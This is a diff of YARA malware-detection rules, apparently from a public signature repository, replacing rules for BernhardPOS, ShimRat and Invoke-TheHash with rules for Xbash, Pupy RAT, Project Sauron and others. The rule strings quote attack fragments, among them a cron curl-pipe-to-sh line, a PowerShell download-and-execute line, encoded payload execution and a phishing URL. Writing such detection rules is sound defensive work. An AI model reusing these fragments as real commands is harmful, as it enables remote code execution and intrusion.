-		reference = "http://morphick.com/blog/2015/7/14/bernhardpos-new-pos-malware-discovered-by-morphick"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_bernhard_pos.yar#L1-L18"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_xbash.yar#L13-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e49820ef02ba5308ff84e4c8c12e7c3d"
-		logic_hash = "c00f2fda5a391b44767d918945069f18cef084dd4dc6aa94d8f945bf97ac462a"
-		score = 70
+		logic_hash = "d686c42e6bf440507735f846463f2df5fbf4f7bd5f5656883655a5278a1fc252"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa"
 
 	strings:
-		$shellcode_kernel32_with_junk_code = { 33 c0 83 ?? ?? 83 ?? ?? 64 a1 30 00 00 00 83 ?? ?? 83 ?? ?? 8b 40 0c 83 ?? ?? 83 ?? ?? 8b 40 14 83 ?? ?? 83 ?? ?? 8b 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8b 00 83 ?? ?? 83 ?? ?? 8b 40 10 83 ?? ?? }
-		$mutex_name = "OPSEC_BERNHARD"
-		$build_path = "C:\\bernhard\\Debug\\bernhard.pdb"
-		$string_decode_routine = { 55 8b ec 83 ec 50 53 56 57 a1 ?? ?? ?? ?? 89 45 f8 66 8b 0d ?? ?? ?? ?? 66 89 4d fc 8a 15 ?? ?? ?? ?? 88 55 fe 8d 45 f8 50 ff ?? ?? ?? ?? ?? 89 45 f0 c7 45 f4 00 00 00 00 ?? ?? 8b 45 f4 83 c0 01 89 45 f4 8b 45 08 50 ff ?? ?? ?? ?? ?? 39 45 f4 ?? ?? 8b 45 08 03 45 f4 0f be 08 8b 45 f4 99 f7 7d f0 0f be 54 15 f8 33 ca 8b 45 08 03 45 f4 88 08 ?? ?? 5f 5e 5b 8b e5 5d }
+		$s1 = { 73 58 62 61 73 68 00 00 00 00 00 00 00 00 }
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x457f and filesize < 10000KB and 1 of them
 }
-rule SIGNATURE_BASE_Shimrat
+rule SIGNATURE_BASE_MAL_Xbash_SH_Sep18 : FILE
 {
 	meta:
-		description = "Detects ShimRat and the ShimRat loader"
-		author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)"
-		id = "21431895-1180-5552-8e82-1589992ffa1d"
-		date = "2015-11-20"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_mofang.yar#L1-L26"
+		description = "Detects Xbash malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "450ef15f-fe9c-5809-9077-457a43326bfe"
+		date = "2018-09-18"
+		modified = "2023-01-06"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_xbash.yar#L27-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0dd19e6a65b06bd5846ec224f01c3feea066540317223d1991154b2305882b20"
+		logic_hash = "b48cbd64002025d861e2fd381be5a68efd7f6fc5fd239850c940f887e2b01673"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af"
+		hash2 = "de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d"
 
 	strings:
-		$dll = ".dll"
-		$dat = ".dat"
-		$headersig = "QWERTYUIOPLKJHG"
-		$datasig = "MNBVCXZLKJHGFDS"
-		$datamarker1 = "Data$$00"
-		$datamarker2 = "Data$$01%c%sData"
-		$cmdlineformat = "ping localhost -n 9 /c %s > nul"
-		$demoproject_keyword1 = "Demo"
-		$demoproject_keyword2 = "Win32App"
-		$comspec = "COMSPEC"
-		$shim_func1 = "ShimMain"
-		$shim_func2 = "NotifyShims"
-		$shim_func3 = "GetHookAPIs"
+		$s1 = "echo \"*/5 * * * * curl -fsSL" fullword ascii
+		$s2 = ".sh|sh\" > /var/spool/cron/root" ascii
+		$s3 = "#chmod +x /tmp/hawk" fullword ascii
+		$s4 = "if [ ! -f \"/tmp/root.sh\" ]" fullword ascii
+		$s5 = ".sh > /tmp/lower.sh" ascii
+		$s6 = "chmod 777 /tmp/root.sh" fullword ascii
+		$s7 = "-P /tmp && chmod +x /tmp/pools.txt" fullword ascii
+		$s8 = "-C /tmp/pools.txt>/dev/null 2>&1" ascii
 
 	condition:
-		($dll and $dat and $headersig and $datasig ) or ( $datamarker1 and $datamarker2 ) or ( $cmdlineformat and $demoproject_keyword1 and $demoproject_keyword2 and $comspec ) or ( $dll and $dat and $shim_func1 and $shim_func2 and $shim_func3 )
+		uint16( 0 ) == 0x2123 and filesize < 3KB and 1 of them
 }
-rule SIGNATURE_BASE_Shimratreporter
+rule SIGNATURE_BASE_MAL_Xbash_JS_Sep18 : FILE
 {
 	meta:
-		description = "Detects ShimRatReporter"
-		author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)"
-		id = "01688b3c-2f06-518f-939d-4d65529be5ae"
-		date = "2015-11-20"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_mofang.yar#L28-L49"
+		description = "Detects XBash malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e891d146-f92d-5144-a1f2-ad308e309870"
+		date = "2018-09-18"
+		modified = "2023-01-06"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_xbash.yar#L50-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "931d65628e5f0b7c63fe270b0a6cd3890f41a4ee7e253ce056b37f2d55542258"
+		logic_hash = "cf2f9006e0ab07f6ff1a0ce4946af34468f7c74143c853c5d77c6db725bb590a"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8"
 
 	strings:
-		$IpInfo = "IP-INFO"
-		$NetworkInfo = "Network-INFO"
-		$OsInfo = "OS-INFO"
-		$ProcessInfo = "Process-INFO"
-		$BrowserInfo = "Browser-INFO"
-		$QueryUserInfo = "QueryUser-INFO"
-		$UsersInfo = "Users-INFO"
-		$SoftwareInfo = "Software-INFO"
-		$AddressFormat = "%02X-%02X-%02X-%02X-%02X-%02X"
-		$proxy_str = "(from environment) = %s"
-		$netuserfun = "NetUserEnum"
-		$networkparams = "GetNetworkParams"
+		$s1 = "var path=WSHShell" fullword ascii
+		$s2 = "var myObject= new ActiveXObject(" ascii
+		$s3 = "window.resizeTo(0,0)" fullword ascii
+		$s4 = "<script language=\"JScript\">" fullword ascii
 
 	condition:
-		all of them
+		filesize < 5KB and 3 of them
 }
-rule SIGNATURE_BASE_Tidepool_Malware : FILE
+rule SIGNATURE_BASE_APT_Pupyrat_PY : FILE
 {
 	meta:
-		description = "Detects TidePool malware mentioned in Ke3chang report by Palo Alto Networks"
+		description = "Detects Pupy RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eec12fd7-f5f8-5bee-98e0-2111766deb55"
-		date = "2016-05-24"
+		id = "cdd689e3-437e-514d-a058-fad80ce0639e"
+		date = "2017-02-17"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/m2CXWR"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_tidepool.yar#L8-L32"
+		reference = "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_magichound.yar#L10-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "759920ed7c9320e8412ed0644b28922a545b04f7549f0da6d6c67d6af8a7af3e"
+		logic_hash = "b30bc3082be3229ea2ef5d7c51ab6f97df2f612c80c45892e1a13fde1fb56725"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba"
-		hash2 = "67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed"
-		hash3 = "2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18"
-		hash4 = "38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f"
-		hash5 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba"
+		hash1 = "8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71"
 
 	strings:
-		$x1 = "Content-Disposition: form-data; name=\"m1.jpg\"" fullword ascii
-		$x2 = "C:\\PROGRA~2\\IEHelper\\mshtml.dll" fullword wide
-		$x3 = "C:\\DOCUME~1\\ALLUSE~1\\IEHelper\\mshtml.dll" fullword wide
-		$x4 = "IEComDll.dat" fullword ascii
-		$s1 = "Content-Type: multipart/form-data; boundary=----=_Part_%x" fullword wide
-		$s2 = "C:\\Windows\\System32\\rundll32.exe" fullword wide
-		$s3 = "network.proxy.socks_port\", " fullword ascii
+		$x1 = "reflective_inject_dll" fullword ascii
+		$x2 = "ImportError: pupy builtin module not found !" fullword ascii
+		$x3 = "please start pupy from either it's exe stub or it's reflective DLLR;" fullword ascii
+		$x4 = "[INJECT] inject_dll." fullword ascii
+		$x5 = "import base64,zlib;exec zlib.decompress(base64.b64decode('eJzzcQz1c/ZwDbJVT87Py0tNLlHnAgA56wXS'))" fullword ascii
+		$op1 = { 8b 42 0c 8b 78 14 89 5c 24 18 89 7c 24 14 3b fd }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) ) ) or ( 4 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 20000KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_Invoke_Smbexec : FILE
+rule SIGNATURE_BASE_APT_Magichound_Malmacro : FILE
 {
 	meta:
-		description = "Detects Invoke-WmiExec or Invoke-SmbExec"
+		description = "Detects malicious macro / powershell in Office document"
 		author = "Florian Roth (Nextron Systems)"
-		id = "07c742f4-3039-5c84-81d4-73ad25b98681"
-		date = "2017-06-14"
+		id = "ad573f52-dbda-5852-ad73-9ef47dd6e7df"
+		date = "2017-02-17"
 		modified = "2023-12-05"
-		reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_invoke_thehash.yar#L12-L30"
+		reference = "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_magichound.yar#L33-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cc9feb7d4eadfc470aabf18d82c884f454ebcdd37f3ca6b0ee4b3634cd9e33ae"
+		logic_hash = "198c6e7ab957d5c1bb45449b0b2210532e97ed11700f8435201200746e0dfa48"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd"
+		super_rule = 1
+		hash1 = "66d24a529308d8ab7b27ddd43a6c2db84107b831257efb664044ec4437f9487b"
+		hash2 = "e5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6"
 
 	strings:
-		$x1 = "Invoke-SMBExec -Target" fullword ascii
-		$x2 = "$packet_SMB_header = Get-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $process_ID_bytes $SMB_user_ID" fullword ascii
-		$s1 = "Write-Output \"Command executed with service $SMB_service on $Target\"" fullword ascii
-		$s2 = "$packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00" fullword ascii
-		$s3 = "$SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \\svcctl" fullword ascii
+		$s1 = "powershell.exe " fullword ascii
+		$s2 = "CommandButton1_Click" fullword ascii
+		$s3 = "URLDownloadToFile" fullword ascii
 
 	condition:
-		( filesize < 400KB and 1 of them )
+		( uint16( 0 ) == 0xcfd0 and filesize < 8000KB and all of them )
 }
-rule SIGNATURE_BASE_Invoke_Wmiexec_Gen_1
+rule SIGNATURE_BASE_APT_MAL_Maldoc_Cloudatlas_Oct20_1 : FILE
 {
 	meta:
-		description = "Detects Invoke-WmiExec or Invoke-SmbExec"
+		description = "Detects unknown maldoc dropper noticed in October 2020"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08b79c7d-c383-5891-af0f-31a92f1ed07d"
-		date = "2017-06-14"
+		id = "e7caf2b2-caf2-5984-a792-8224f2641bda"
+		date = "2020-10-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_invoke_thehash.yar#L32-L51"
+		reference = "https://twitter.com/jfslowik/status/1316050637092651009"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cloudatlas.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "12aeba5255527a337c49f1c4d1dc506a13ea02da69a8fc509c77bcb07c2135c8"
+		logic_hash = "772bdd8ec89edf2054e675e9ecb321a7bfe0307a7086a4e5b65f8d8b8cf80ecc"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "140c23514dbf8043b4f293c501c2f9046efcc1c08630621f651cfedb6eed8b97"
-		hash2 = "7565d376665e3cd07d859a5cf37c2332a14c08eb808cc5d187a7f0533dc69e07"
+		tags = "FILE"
+		hash1 = "7ba76b2311736dbcd4f2817c40dae78f223366f2404571cd16d6676c7a640d70"
 
 	strings:
-		$x1 = "Invoke-WMIExec " ascii
-		$x2 = "$target_count = [System.math]::Pow(2,(($target_address.GetAddressBytes().Length * 8) - $subnet_mask_split))" fullword ascii
-		$s1 = "Import-Module $PWD\\Invoke-TheHash.ps1" fullword ascii
-		$s2 = "Import-Module $PWD\\Invoke-SMBClient.ps1" fullword ascii
-		$s3 = "$target_address_list = [System.Net.Dns]::GetHostEntry($target_long).AddressList" fullword ascii
-		$x4 = "Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0" ascii
+		$x1 = "https://msofficeupdate.org" wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0xcfd0 and filesize < 300KB and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_Invoke_Smbexec_Invoke_Wmiexec_1
+rule SIGNATURE_BASE_APT_MAL_URL_Cloudatlas_Oct20_2 : FILE
 {
 	meta:
-		description = "Auto-generated rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1"
+		description = "Detects unknown maldoc dropper noticed in October 2020 - file morgue6visible5bunny6culvert7ambo5nun1illuminate4.url"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fd1c6599-028d-5535-beb8-5b2658481b97"
-		date = "2017-06-14"
+		id = "91f6362f-1793-58a3-a750-04ec9812b9df"
+		date = "2020-10-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_invoke_thehash.yar#L53-L70"
+		reference = "https://twitter.com/jfslowik/status/1316050637092651009"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cloudatlas.yar#L18-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "feb2973cd7e2c221cd91ec543f1d943cf1b5d5d18fe74c8f7e58341f76f95b51"
+		logic_hash = "8bb60c262a34babbe8839f5d39d1c972eeb41ea77eaae02cc877d908c7033f13"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd"
-		hash2 = "b41bd54bbf119d153e0878696cd5a944cbd4316c781dd8e390507b2ec2d949e7"
+		tags = "FILE"
+		hash1 = "a6a58b614a9f5ffa1d90b5d42e15521f52e2295f02c1c0e5cd9cbfe933303bee"
 
 	strings:
-		$s1 = "$process_ID = $process_ID -replace \"-00-00\",\"\"" fullword ascii
-		$s2 = "Write-Output \"$Target did not respond\"" fullword ascii
-		$s3 = "[Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)" fullword ascii
+		$hc1 = { 5B 49 6E 74 65 72 6E 65 74 53 68 6F 72 74 63 75
+               74 5D 0D 0A 55 52 4C 3D 68 74 74 70 73 3A 2F 2F
+               6D 73 6F 66 66 69 63 65 75 70 64 61 74 65 2E 6F
+               72 67 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x495b and filesize < 200 and $hc1 at 0
 }
-rule SIGNATURE_BASE_Invoke_Wmiexec_Gen
+rule SIGNATURE_BASE_APT_Project_Sauron_Scripts
 {
 	meta:
-		description = "Auto-generated rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1"
+		description = "Detects scripts (mostly LUA) from Project Sauron report by Kaspersky"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08b79c7d-c383-5891-af0f-31a92f1ed07d"
-		date = "2017-06-14"
+		id = "575a6f1b-5a4d-5f81-b44a-b7025dbec2a5"
+		date = "2016-08-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_invoke_thehash.yar#L72-L90"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L1-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1ee79b7ea576adb71bde903756cda7af22e55eee9c4c3964cc9edc8930083fa2"
+		logic_hash = "275ec8de40ae973b4ec4c891c56a70fc2fd05abff258b8015d986d0106506367"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "56c6012c36aa863663fe5536d8b7fe4c460565d456ce2277a883f10d78893c01"
-		hash2 = "674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd"
-		hash3 = "b41bd54bbf119d153e0878696cd5a944cbd4316c781dd8e390507b2ec2d949e7"
 
 	strings:
-		$s1 = "$NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes)" fullword ascii
-		$s2 = "$client_challenge = [String](1..8 | ForEach-Object {\"{0:X2}\" -f (Get-Random -Minimum 1 -Maximum 255)})" fullword ascii
-		$s3 = "$NTLM_hash_bytes = $NTLM_hash_bytes.Split(\"-\") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}" fullword ascii
+		$x1 = "local t = w.exec2str(\"regedit "
+		$x2 = "local r = w.exec2str(\"cat"
+		$x3 = "ap*.txt link*.txt node*.tun VirtualEncryptedNetwork.licence"
+		$x4 = "move O FakeVirtualEncryptedNetwork.dll"
+		$x5 = "sinfo | basex b 32url | dext l 30"
+		$x6 = "w.exec2str(execStr)"
+		$x7 = "netnfo irc | basex b 32url"
+		$x8 = "w.exec(\"wfw status\")"
+		$x9 = "exec(\"samdump\")"
+		$x10 = "cat VirtualEncryptedNetwork.ini|grep"
+		$x11 = "if string.lower(k) == \"securityproviders\" then"
+		$x12 = "exec2str(\"plist b | grep netsvcs\")"
+		$x14 = "SAURON_KBLOG_KEY ="
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Beacon_K5Om : FILE
+rule SIGNATURE_BASE_HKTL_Dsniff
 {
 	meta:
-		description = "Detects Meterpreter Beacon - file K5om.dll"
+		description = "Detects Dsniff hack tool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9354d20a-d798-55bf-a735-820f21d4a861"
-		date = "2017-06-07"
+		id = "eb39185b-330f-5b93-ac58-0465e5767919"
+		date = "2019-02-19"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt19.yar#L10-L30"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L27-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4b1ec0fc6c0ad4e76c526f7568153bca62f9bffdd38a3b1eaa51a37a1dcab226"
-		score = 75
+		logic_hash = "0edd3ba7e78ee2810aa3c7643a96382c1fe0b5e627913a5a9bac2e83c8d40274"
+		score = 55
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9"
+		tags = ""
 
 	strings:
-		$x1 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
-		$x2 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
-		$x3 = "%d is an x86 process (can't inject x64 content)" fullword ascii
-		$s1 = "Could not open process token: %d (%u)" fullword ascii
-		$s2 = "0fd00b.dll" fullword ascii
-		$s3 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" fullword ascii
-		$s4 = "Could not connect to pipe (%s): %d" fullword ascii
+		$x1 = ".*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 3 of them ) )
+		1 of them
 }
-rule SIGNATURE_BASE_FE_LEGALSTRIKE_MACRO
+rule SIGNATURE_BASE_APT_Project_Sauron_Arping_Module
 {
 	meta:
-		description = "This rule is designed to identify macros with the specific encoding used in the sample 30f149479c02b741e897cdb9ecd22da7."
-		author = "Ian.Ahl@fireeye.com @TekDefense - modified by Florian Roth"
-		id = "eb15e5aa-16e5-5c07-a293-ad15c0c09d8e"
-		date = "2017-06-02"
+		description = "Detects strings from arping module - Project Sauron report by Kaspersky"
+		author = "Florian Roth (Nextron Systems)"
+		id = "42389511-de92-57cb-9dee-9f829fd5e55a"
+		date = "2016-08-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt19.yar#L34-L50"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L41-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b38edeedcc02168d3ba7e82c3f5c6963ffc8ce1688eeb424ce686484f3687512"
+		logic_hash = "d87e91441994c4ed863596d79c108c9f72adfb708f885cb63a881eb25aa089b7"
 		score = 75
 		quality = 85
 		tags = ""
-		version = ".1"
-		filetype = "MACRO"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ob1 = "ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) & ChrW(50) & ChrW(46) & ChrW(101)" ascii wide
-		$wsobj1 = "Set Obj = CreateObject(\"WScript.Shell\")" ascii wide
-		$wsobj2 = "Obj.Run " ascii wide
+		$s1 = "Resolve hosts that answer"
+		$s2 = "Print only replying Ips"
+		$s3 = "Do not display MAC addresses"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FE_LEGALSTRIKE_RTF : FILE
+rule SIGNATURE_BASE_APT_Project_Sauron_Kblogi_Module
 {
 	meta:
-		description = "Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDOTcom"
-		author = "joshua.kim@FireEye. - modified by Florian Roth"
-		id = "b62ceffa-445f-517e-b86b-56e47876c6c0"
-		date = "2017-06-02"
+		description = "Detects strings from kblogi module - Project Sauron report by Kaspersky"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e1dd4d1a-1089-5897-8f4a-52c7068802fa"
+		date = "2016-08-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt19.yar#L52-L69"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L57-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "af811694076f7d53ee76713538839c4ec82c591518d59d5988dcb893bfd32ffe"
+		logic_hash = "bba87b17a62fc968e89d4f6d10de06875c6b7f47c8bb7ae3f7932804b23a8e87"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		version = ".1"
-		filetype = "MACRO"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$lnkinfo = "4c0069006e006b0049006e0066006f"
-		$encoded1 = "4f4c45324c696e6b"
-		$encoded2 = "52006f006f007400200045006e007400720079"
-		$encoded3 = "4f0062006a0049006e0066006f"
-		$encoded4 = "4f006c0065"
-		$datastore = "\\*\\datastore"
+		$x1 = "Inject using process name or pid. Default"
+		$s2 = "Convert mode: Read log from file and convert to text"
+		$s3 = "Maximum running time in seconds"
 
 	condition:
-		uint32be( 0 ) == 0x7B5C7274 and all of them
+		$x1 or 2 of them
 }
-rule SIGNATURE_BASE_Crime_Win32_Parallax_Loader_1 : FILE
+rule SIGNATURE_BASE_APT_Project_Sauron_Basex_Module
 {
 	meta:
-		description = "Detects Parallax Loader"
-		author = "@VK_Intel"
-		id = "5e030b68-3c29-5203-bb4e-f01850bfbbab"
-		date = "2020-02-24"
+		description = "Detects strings from basex module - Project Sauron report by Kaspersky"
+		author = "Florian Roth (Nextron Systems)"
+		id = "51ef3826-af5c-562b-a1f8-3bf11532ac2d"
+		date = "2016-08-08"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/VK_Intel/status/1227976106227224578"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_parallax_rat.yar#L2-L18"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L73-L87"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1331e7b69fd9b14b5d2dae45b452b385e48018290d91de33a4f4a5ebcce4805b"
+		logic_hash = "90cfb58017d62312c56908aca1a48bb7425f5cd51540298ecf65305b46ffb2c8"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "829fce14ac8b9ad293076c16a1750502c6b303123c9bd0fb17c1772330577d65"
+		tags = ""
